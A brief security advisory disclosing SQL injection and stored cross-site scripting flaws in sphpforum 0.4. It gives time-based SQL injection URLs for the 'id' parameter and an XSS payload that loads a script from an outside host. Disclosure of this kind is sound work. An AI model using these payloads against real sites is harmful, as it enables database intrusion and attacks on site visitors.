Sphpforum Multiple Exploits

Summary

Sphpforum 0.4 suffers from multiple vulnerabilities.

Credit:

The information has been provided by loneferret.


Details

Vulnerable Systems:
 * sphpforum 0.4

Due to improper input sanitation, parameters are prone to SQL injection. Stored crossed site scripting is also present in some forms.

# PoC 1:
# SQL Injection
# Page: view_topic.php / view_profile.php?
# Vulnerable param: ‘id’
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271

# PoC 2:
# Stored XSS
# Page: create_topic.php
# Vulnerable field: Topic
# Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Disclosure Timeline:
Published: 2012-08-15

Categories: Exploits